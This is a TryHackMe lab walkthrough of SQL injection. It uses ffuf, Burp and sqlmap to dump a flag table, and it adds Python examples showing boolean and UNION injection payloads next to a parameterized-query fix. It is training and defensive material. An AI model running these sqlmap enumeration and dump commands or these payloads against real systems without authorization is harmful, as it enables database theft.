SQLMAP Room: A TryHackMe 101 Walkthrough
Introduction:
SQL injection remains one of the most common and most damaging web application vulnerabilities. SQLMap is the standard open-source tool for finding and exploiting it. In this article we cover what SQLMap is, how to install it, the handful of commands you will use most, and then work through Part 3 of the TryHackMe room “SQLMAP”, where a SQL injection flaw in a small web application leads to the flag.
What is SQLMap?
SQLMAP is an automated penetration testing tool that detects and exploits SQL injection vulnerabilities. Developed in Python, SQLMAP makes it easier for ethical hackers and security professionals to identify and exploit SQL injection flaws in web applications. It provides a wide array of features, allowing users to retrieve database information, access and modify data, and even execute commands on the underlying operating system.
How to Install SQLMAP:
SQLMap is a Python program, so it runs anywhere Python does (Windows, Linux, macOS). On Kali Linux it is already packaged and available as the `sqlmap` command. Elsewhere, clone the repository and run the `sqlmap.py` script from the cloned directory:
Clone SQLMAP Repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
Essential SQLMap Commands:
Here are the SQLMap commands used most often, with a short explanation of each:
1. Basic Scan Command:
sqlmap -u <target-url>
- Explanation: Initiates a basic SQL injection scan on the specified target URL.
2. POST Request Command:
sqlmap -u <target-url> --data "<post-data>"
- Explanation: Used when the target is a form submitted with HTTP POST; the POST body (for example "user=a&pass=b") is passed with --data, and SQLMap tests each parameter in it. Parameters in the URL query string are tested by default with -u alone, so no extra option is needed for GET.
3. Database Enumeration Command:
sqlmap -u <target-url> --dbs
- Explanation: Lists available databases on the target.
4. Table Enumeration Command:
sqlmap -u <target-url> -D <database-name> --tables
- Explanation: Lists tables within a specified database.
5. Column Enumeration Command:
sqlmap -u <target-url> -D <database-name> -T <table-name> --columns
- Explanation: Lists columns within a specified table.
6. Dump Data Command:
sqlmap -u <target-url> -D <database-name> -T <table-name> -C <column-name> --dump
- Explanation: Dumps the data from the specified column in the specified table.
TryHackMe Room Toolkit: FFUF, BurpSuite, SQLMap Trio:
Now armed with essential SQLMap knowledge, let’s seamlessly transition to the TryHackMe room. In this space, our toolkit features three critical tools:
- FFUF for Directory Busting: Using FFUF to find hidden paths and potential entry points within the web application, ensuring a thorough exploration of its structure.
- BurpSuite for Request Capture: Utilize BurpSuite to intercept and scrutinize HTTP requests, gaining insights into the application’s communication and pinpointing potential vulnerabilities for future exploitation.
- SQLMap for Identifying and Exploiting SQL Injection: Our cornerstone tool, SQLMap, automates detection of SQL injection in the parameter we hand it and then enumerates and dumps the database, which is how we will measure the impact of the flaw.
With this strategic trio of FFUF, BurpSuite, and SQLMap, we aim to uncover vulnerabilities and deepen our skills in ethical hacking and penetration testing. Let’s step into the TryHackMe room and put these tools to work.
SQLMAP Challenge From TryHackMe Room:
In this walkthrough, we will exclusively focus on Part 3 of the TryHackMe room “SQLMAP” as Parts 1 and 2 are self-explanatory. Now, the real fun begins as we tackle the challenge of exploiting SQL vulnerabilities, armed with our trusty tools: FFUF, BurpSuite, and SQLMap. Let’s dive in and start cracking.
Our Task:
Exploit a SQL Injection vulnerability in the deployed ‘Blood Donations’ application to uncover the flag. The application appears to have a security flaw that allows unauthorized access, and your goal is to leverage SQL Injection techniques to gain access and retrieve the flag.
Step 1: Connecting With TryHackMe VPN
Before starting, make sure your TryHackMe VPN is connected and working. If you need help with the VPN connection, refer to this article.
Step 2: Launch the Machine
Start the machine provided in the room and give it 3–4 minutes to boot. Once it is up, the room page shows the IP address of the newly deployed machine; use that address in all of the commands below.
Step 3: Ping the Machine
Check that the machine is responsive by pinging it from the terminal of your Kali Linux machine:
ping <Machine_IP>
Example:
ping 10.10.123.134
If you get replies, proceed to the next step.
Step 4: Discovering Hidden Paths with FFUF
Opening the machine’s IP address “http://10.10.123.134” in a web browser shows a page with very little on it. To find the rest of the application we brute-force paths with ffuf. The command below uses rockyou.txt, which is really a password list of about 14 million entries; a dedicated directory wordlist (for example the dirb or SecLists web-content lists shipped with Kali) is the usual choice and finishes far faster. It works here because the hidden path turns out to be an ordinary English word that rockyou contains.
Command :
ffuf -u http://10.10.123.134/FUZZ -w /usr/share/wordlists/rockyou.txt
ffuf reports the hidden path “/blood”. Loading “http://10.10.123.134/blood” in the browser shows a search form; we investigate it in the next step.
Step 5: Analyzing the request in BurpSuite
The newly discovered page has a button labeled “Search.” With the browser proxied through BurpSuite, clicking it shows that the form is submitted as a POST request with its values in the request body. In Burp, right-click the intercepted request and choose “Copy to file” to save the raw request as “req.txt”; this is the file SQLMap will replay with -r. Looking at the body, the parameter “blood_group” carries the user-supplied search value and is our injection candidate. The following steps test and exploit it.
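To make concrete what `sqlmap -r req.txt` actually consumes, here is an added example (not part of the room or of sqlmap) that parses a Burp-saved raw request the same way: request line, headers, and URL-encoded body parameters. The sample request embedded below is constructed for illustration; its headers and the second form field are assumptions, not captured from the real machine. It also flags a Content-Length that no longer matches the body, a common breakage after hand-editing req.txt.

```python
"""Parse a raw HTTP request file of the kind Burp saves and sqlmap -r replays.

Added example, not code from the TryHackMe room or from sqlmap. It shows what
sqlmap reads from req.txt: the method, the path, the Host header (to rebuild
the URL) and the body parameters, one of which (blood_group) becomes the
injection point selected with -p.
"""
from urllib.parse import parse_qsl

# Constructed sample request (CRLF line endings, as Burp writes them).
# The User-Agent and the "search" submit field are assumed for illustration.
SAMPLE_REQ = (
    "POST /blood HTTP/1.1\r\n"
    "Host: 10.10.123.134\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 30\r\n"
    "\r\n"
    "blood_group=A%2B&search=Search"
)


def parse_raw_request(raw: str) -> dict:
    """Split a raw request into method, url, headers, body params and warnings."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        # Tolerate LF-only files (e.g. the request was edited in a Unix editor).
        head, sep, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, path, version = lines[0].split(" ", 2)

    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()

    host = headers.get("host", "")
    # Scheme is not in the file; sqlmap assumes http unless told otherwise.
    url = f"http://{host}{path}" if host else path

    # Body parameters in application/x-www-form-urlencoded form; %2B decodes to '+'.
    params = dict(parse_qsl(body, keep_blank_values=True)) if body else {}

    warnings = []
    declared = headers.get("content-length")
    if declared is not None and int(declared) != len(body.encode()):
        warnings.append(
            f"Content-Length header says {declared} but body is "
            f"{len(body.encode())} bytes; fix it or the server may truncate the body"
        )
    return {
        "method": method,
        "path": path,
        "version": version,
        "url": url,
        "headers": headers,
        "params": params,
        "warnings": warnings,
    }


def sqlmap_command(req_file: str, param: str) -> list:
    """The argv sqlmap would be started with for the saved request and chosen parameter."""
    return ["sqlmap", "-r", req_file, "-p", param, "--batch"]


if __name__ == "__main__":
    req = parse_raw_request(SAMPLE_REQ)
    print(req["method"], req["url"])
    print("body parameters:", req["params"])
    print(" ".join(sqlmap_command("req.txt", "blood_group")))
```

`--batch` is worth adding to every sqlmap command on this page: it accepts the default answer to sqlmap’s interactive questions, so a long enumeration does not sit waiting for input.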
Step 6: Finding the Current Database User Using SQLMAP
SQLMap replays the saved request with -r and, with -p, tests only the parameter we name. Once it confirms the injection, --current-user asks the database which account the application connects as:
Command:
sqlmap -r req.txt -p blood_group --current-user
Step 7: Finding All The Databases Using SQLMAP
Using the same vulnerable parameter, we list every database the current user can see with --dbs:
Command:
sqlmap -r req.txt -p blood_group --dbs
The output includes a database named “blood”. The next steps explore it to find the flag.
Step 8: Finding All The Tables in the Blood Database Using SQLMAP
With the blood database identified, we enumerate its tables by adding -D blood and --tables:
Command:
sqlmap -r req.txt -p blood_group -D blood --tables
Step 9: Dumping the Data and Finding the Final Flag
The table list includes one named “flag”. Dumping it gives us the final flag:
sqlmap -r req.txt -p blood_group -D blood -T flag --dump
Executing this command enables the extraction of the final flag, thereby concluding the room exploration process.
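Everything SQLMap did in Steps 6 to 9 rests on one flaw: the search value is concatenated into a SQL statement. The added example below (not the room’s source code, whose real schema and query are not shown on the page) models a blood-donation search over a constructed SQLite database with a donors table and a flag table. It shows the boolean probe SQLMap uses to confirm an injection point, a UNION payload that pulls the flag out through the search results, and the parameterized query that stops both.

```python
"""Model of the injection class exploited in the room, with the fix beside it.

Added example, not the TryHackMe application's code. The schema, table contents,
flag value and query shape are constructed for illustration.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory database standing in for the room's 'blood' database."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE donors (id INTEGER PRIMARY KEY, name TEXT, blood_group TEXT);
        CREATE TABLE flag   (id INTEGER PRIMARY KEY, flag TEXT);
        INSERT INTO donors (name, blood_group) VALUES
            ('Alice', 'A+'), ('Bob', 'O-'), ('Carol', 'A+');
        INSERT INTO flag (flag) VALUES ('THM{constructed_example_flag}');
        """
    )
    return con


def search_vulnerable(con: sqlite3.Connection, blood_group: str) -> list:
    """The flaw: the POST parameter is pasted straight into the SQL text."""
    sql = f"SELECT name, blood_group FROM donors WHERE blood_group = '{blood_group}'"
    return con.execute(sql).fetchall()


def search_safe(con: sqlite3.Connection, blood_group: str) -> list:
    """The fix: a bound parameter is always data, never SQL."""
    sql = "SELECT name, blood_group FROM donors WHERE blood_group = ?"
    return con.execute(sql, (blood_group,)).fetchall()


# What sqlmap does first: two payloads that differ only in a true/false
# condition. A vulnerable endpoint answers them differently.
TRUE_PROBE = "A+' AND 1=1-- -"
FALSE_PROBE = "A+' AND 1=2-- -"


def is_boolean_injectable(search) -> bool:
    """Return True when the true/false probes produce different result sets."""
    con = build_db()
    return search(con, TRUE_PROBE) != search(con, FALSE_PROBE)


# What --dump relies on: a UNION that appends rows from another table to the
# two-column result of the original query.
UNION_PAYLOAD = "' UNION SELECT flag, NULL FROM flag-- -"


def steal_flag(search) -> list:
    """Flag values recovered through the search function, empty if none leaks."""
    con = build_db()
    return [row[0] for row in search(con, UNION_PAYLOAD) if row[0] and row[0].startswith("THM{")]


if __name__ == "__main__":
    for name, fn in (("vulnerable", search_vulnerable), ("parameterized", search_safe)):
        print(f"{name}: injectable={is_boolean_injectable(fn)} leaked={steal_flag(fn)}")
```

The parameterized version returns no rows for either payload because it looks for a donor whose blood group is literally the payload string; the only way to read the flag table is through the `flag` table’s own authorised code path, which this application does not have.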
Conclusion:
In summary, we used ffuf to find the hidden /blood path, then captured the form’s POST request in BurpSuite and saved it as req.txt, which pointed us at the “blood_group” parameter. Handing that request to SQLMap with -r and -p, we confirmed the injection and learned the current database user, listed the databases and found “blood”, enumerated its tables, and finally dumped the “flag” table to retrieve the flag. The exercise shows the normal progression of a SQL injection test: find the input, prove the injection, then enumerate outward from what the database user can see.
If you’re keen on more of these adventures, hit that follow button for future articles — we’re just getting started!